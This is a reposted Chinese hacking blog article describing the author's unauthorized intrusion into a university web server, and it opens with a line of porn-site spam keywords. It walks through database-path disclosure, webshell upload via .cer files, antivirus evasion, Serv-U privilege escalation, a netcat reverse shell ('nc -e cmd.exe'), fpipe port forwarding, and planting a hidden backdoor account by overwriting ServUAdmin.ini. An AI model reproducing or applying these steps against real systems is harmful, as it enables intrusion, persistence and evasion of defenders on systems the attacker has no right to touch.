中文字幕在线观看,亚洲а∨天堂久久精品9966,亚洲成a人片在线观看你懂的,亚洲av成人片无码网站,亚洲国产精品无码久久久五月天

管理員權(quán)限上傳漏洞解析

2017-11-30    來(lái)源:

容器云強(qiáng)勢(shì)上線!快速搭建集群,上萬(wàn)Linux鏡像隨意使用

  這兩天很無(wú)聊,趁著放假的時(shí)間就準(zhǔn)備練習(xí)下自己的入侵技術(shù),沒(méi)有什么目標(biāo)就準(zhǔn)備測(cè)試下周?chē)髮W(xué)網(wǎng)站的安全性,順便拿網(wǎng)站練練手。大部分這些網(wǎng)站的管理員應(yīng)該說(shuō)安全意識(shí)都不錯(cuò)的,畢竟都是大學(xué)的管理員啊!可是測(cè)試結(jié)果很不近人意,最后結(jié)果都拿到了管理員權(quán)限。但是也并不是一帆風(fēng)順的,好多時(shí)候管理員總是設(shè)置些不大不小的障礙,跟人開(kāi)的玩笑還真有點(diǎn)讓人一下子不知道怎么辦。這里寫(xiě)出來(lái)的意思算就是給各位入侵者一些小小的經(jīng)驗(yàn)和管理員一點(diǎn)點(diǎn)的提醒吧!

  廢話少說(shuō),我就把入侵中遇到的一些小麻煩組合到一次入侵中吧!現(xiàn)在的網(wǎng)站一般都有防火墻,一些很有錢(qián)的大學(xué)甚至?xí)杏布阑饓Γ詮拈_(kāi)始我就沒(méi)有打算從正面突破,隨便telnet了幾個(gè)端口在看到長(zhǎng)長(zhǎng)的延時(shí)后就直接轉(zhuǎn)到了web程序方面?戳讼戮W(wǎng)站的應(yīng)用程序,都是asp版本的,可是看了一會(huì)發(fā)現(xiàn)有個(gè)url管理系統(tǒng)下面的版權(quán)所有赫然寫(xiě)著2002-2003!汗,這樣的程序一般是漏洞齊全啊!于是找了一個(gè)隱藏的url然后直接%5c暴庫(kù),得到路徑后下載數(shù)據(jù)庫(kù),得到帳號(hào)密碼后到新聞系統(tǒng)直接進(jìn)入后臺(tái),修改上傳類(lèi)型為可以上傳asp文件,然后……(這里是介紹突破管理員的一些設(shè)置,就不講如何入侵了和抓圖了,反正大家都很熟悉^_^)。

  馬上遇到管理員跟我們開(kāi)的第一個(gè)玩笑了,上傳的時(shí)候明明已經(jīng)修改為可以上傳asp的文件類(lèi)型,但是就是提示不允許,嘿嘿,沒(méi)關(guān)系,我修改為可以上傳cer文件得到上傳的木馬如圖一。于是我興沖沖的準(zhǔn)備寫(xiě)asp木馬了,用的是修改了的海洋木馬,這里保存為了test.asp文件,但是訪問(wèn)的時(shí)候居然是404不存在。汗,有殺毒軟件?沒(méi)關(guān)系,呵呵,再保存為cer文件試試,居然還是404!于是又選擇保存為gif居然都失敗了,include預(yù)處理的方法都不行了。于是保存一個(gè)內(nèi)容為的文本文檔,再訪問(wèn)的時(shí)候過(guò)了一段時(shí)間居然可以訪問(wèn),基本確定是很BT的殺毒軟件了。不過(guò)對(duì)內(nèi)容不過(guò)濾那就好辦啊,將保存為一個(gè)111.asp。哈哈,出來(lái)了!用客戶(hù)端連上去,OK!如圖二。避開(kāi)殺毒軟件了。這里,算是管理員設(shè)置的一個(gè)阻礙吧!這里我看到好多人躲開(kāi)殺毒軟件的辦法都是加密的方式,但是還是躲不開(kāi)一個(gè)execute()函數(shù)的,如果殺毒軟件將這個(gè)字符串也列為查殺對(duì)象的話,估計(jì)還得搞點(diǎn)大小寫(xiě)轉(zhuǎn)換的技巧。還有一種木馬是以例似的形式,后面就是加密或者不加密的代碼了,但是還是逃不了那個(gè)

  好了,連上去了四處看看可是好象有一個(gè)文件夾居然不能操作啊!看看,上傳文件總是出現(xiàn)如圖三。開(kāi)始還以為出現(xiàn)什么問(wèn)題呢,明明不存在同名文件啊,以為是權(quán)限的原因,但是我不是已經(jīng)寫(xiě)上了asp文件么?奇怪!看了半天看到文件夾的名字里有個(gè)#號(hào)。汗,不會(huì)是這個(gè)搞的鬼吧!當(dāng)時(shí)一些管理員為防止人下載將數(shù)據(jù)庫(kù)名字里加這個(gè)#,這位倒很有個(gè)性啊,在文件夾里加這個(gè),不知道的人還真郁悶?zāi)?嘿嘿!,在操作里將#改成%23,哈哈果然可以操作了。管理員第二個(gè)小玩笑就這樣被破除了。

  可以操作文件后當(dāng)然是看是否可以提升權(quán)限了,打開(kāi)海洋木馬操作命令,出現(xiàn)的情況有點(diǎn)郁悶。提示文件無(wú)法被打開(kāi)啊!如圖四。一般這樣的情況要么是cmd.exe被設(shè)置了權(quán)限要么就是這個(gè)目錄不可以寫(xiě),不能保存temp文件。好說(shuō),先上傳個(gè)cmd.exe到這個(gè)目錄試試。上傳后在cmd.exe路徑里填寫(xiě)該cmd.exe文件的路徑,再執(zhí)行netuser試試,哈哈,出來(lái)了吧!這是比較幸運(yùn)的情況,有時(shí)候什么都可以傳上去,但是cmd.exe就是傳不上去,不過(guò)也沒(méi)有關(guān)系啊!我一般直接傳上net.exe然后在參數(shù)里寫(xiě)上user或者start,效果一樣的好啊!如圖五呵呵!這里就看看netstart里的有個(gè)server-u,哈哈。死定了他!其實(shí)這在海洋木馬的查看進(jìn)程里也可以看到的。于是傳上server-u本地溢出工具,嘿嘿,執(zhí)行命令成功!不用說(shuō)了,這是system權(quán)限啊!輕松突破設(shè)置得不嚴(yán)密的權(quán)限。

  本以為開(kāi)個(gè)3389可以走人了,但是管理員的第四個(gè)玩笑可是有意思啊!居然除了80端口外什么端口都連不上,估計(jì)有什么我所不明白的軟件吧!不過(guò)找了半天也不知道那個(gè)服務(wù)是防火墻。上次突破一臺(tái)主機(jī)有windows自帶防火墻,我直接server-u溢出停掉他了!我有system權(quán)限我怕誰(shuí)?這里你禁止向內(nèi)連接偶就不信你還能拒絕對(duì)外連接。馬上本地監(jiān)聽(tīng)端口,然后用溢出執(zhí)行命令nc-ecmd.exeipport,如圖六。不一會(huì)果然這里就有cmdshell了,最高權(quán)限哦!如圖七。嘿嘿,管理員的防火墻在我們看來(lái)不也就是個(gè)玩笑了么?如果你想上他的3389的話,可以在夜深人靜的時(shí)候上傳fpipe執(zhí)行

  fpipe-l80-r3389127.0.0.1

  不過(guò)最好先把他的iis停掉(知道為什么叫你夜深人靜的時(shí)候動(dòng)手吧!^_^)。這樣的防火墻就只是個(gè)不會(huì)看門(mén)的玩物了。

  不過(guò),入侵是要留個(gè)后門(mén)的,方便;貋(lái)看看,80端口的web就不要管了,插入的幾個(gè)海洋服務(wù)端估計(jì)他是查不出的。最好不要用灰鴿子之類(lèi)的東西了,他殺毒軟件那么BT,遲早有一天被K,有server-u的話還是建立個(gè)后門(mén)帳戶(hù)的比較好點(diǎn),不會(huì)被殺,還實(shí)惠?墒沁@里我沒(méi)有直接添加server-u帳戶(hù)的工具,自己編譯代碼也不會(huì),不過(guò)菜鳥(niǎo)有菜鳥(niǎo)的辦法。將他的serveru配置文件下載下來(lái)到本機(jī),做了個(gè)備份后,添加特權(quán)帳號(hào)的過(guò)程我就不寫(xiě)了,如圖八不過(guò)最后我用了fc命令比較那兩個(gè)文件。嘿嘿,因?yàn)槠┤绨姹咎?hào)什么的都會(huì)自動(dòng)更改,還有注冊(cè)碼都變成本機(jī)的了,本著不要改變主機(jī)設(shè)置的原則進(jìn)程id什么的我就不改了。注意,默認(rèn)添加的帳號(hào)是在文件的最后面,一眼就可以看出來(lái),這里我把他弄到中間去了,這個(gè)比較隱蔽?墒钱(dāng)我添加完成后。再用木馬傳到主機(jī)上去,因?yàn)槭莄:\下面的,所以沒(méi)有改寫(xiě)的權(quán)限。不過(guò)先寫(xiě)個(gè)批處理傳上去,然后用得到的cmdshell執(zhí)行。內(nèi)容如下

  del"C:\ProgramFiles\Serv-U\ServUAdmin.ini"&©H:\z$df#web\ServUAdmin.iniC:\ProgramFiles\Serv-U\

  執(zhí)行后先連接他的21端口發(fā)現(xiàn)居然沒(méi)開(kāi),汗!管理員還記得玩這樣的把戲!想了一會(huì),還是跑到配置文件的最下面看到

  [DOMAINS]

  Domain1=202.x.x.x||1221|ftp.xxx.edu.cn|1|0|0

  赫然的1221在那里呢!馬上連上去,心愛(ài)的server-u連接界面跳出來(lái)了!激動(dòng)ing!不只這些,好多朋友在進(jìn)入主機(jī)后都找不到3389之類(lèi)的端口。netstat-an看下,運(yùn)氣好的話還能看出來(lái),運(yùn)氣不好的話就……呵呵!不過(guò)沒(méi)有關(guān)系,server-u的端口在ini文件里,3389的就在注冊(cè)表里,拿到權(quán)限可以讀出來(lái)啊!還有,如果有高權(quán)限的cmdshell話,直接上傳fport全都出來(lái)。呵呵!管理員最后的一個(gè)玩笑也被突破,事情搞定。

  其實(shí)這些管理員的安全意識(shí)也不差,知道設(shè)置cmd.exe權(quán)限,知道防火墻殺毒軟件一起上,知道哪些文件危險(xiǎn),知道屏蔽端口,可是這些對(duì)付一些普通的掃描和溢出是可以的,但是對(duì)一個(gè)方面的重視是不夠的,要記得木桶理論,重視web安全,把入侵者擋在系統(tǒng)之外遠(yuǎn)比設(shè)置一些似乎管用的障礙更重要!而對(duì)于安全愛(ài)好者而言,也要有永不放棄的精神,多動(dòng)腦筋,不要缺乏想象力什么樣的障礙一定可以突破的。這里是我的一些經(jīng)驗(yàn),有什么問(wèn)題請(qǐng)到非安全論壇討論。

標(biāo)簽: 安全 代碼 防火墻 漏洞 權(quán)限 數(shù)據(jù)庫(kù) 網(wǎng)站 問(wèn)題 選擇 硬件防火墻

版權(quán)申明:本站文章部分自網(wǎng)絡(luò),如有侵權(quán),請(qǐng)聯(lián)系:west999com@outlook.com
特別注意:本站所有轉(zhuǎn)載文章言論不代表本站觀點(diǎn)!
本站所提供的圖片等素材,版權(quán)歸原作者所有,如需使用,請(qǐng)與原作者聯(lián)系。

上一篇:新木馬可篡改路由器設(shè)定 監(jiān)控網(wǎng)絡(luò)流量

下一篇:揭密局域網(wǎng)計(jì)算機(jī)病毒獨(dú)有的七大特點(diǎn)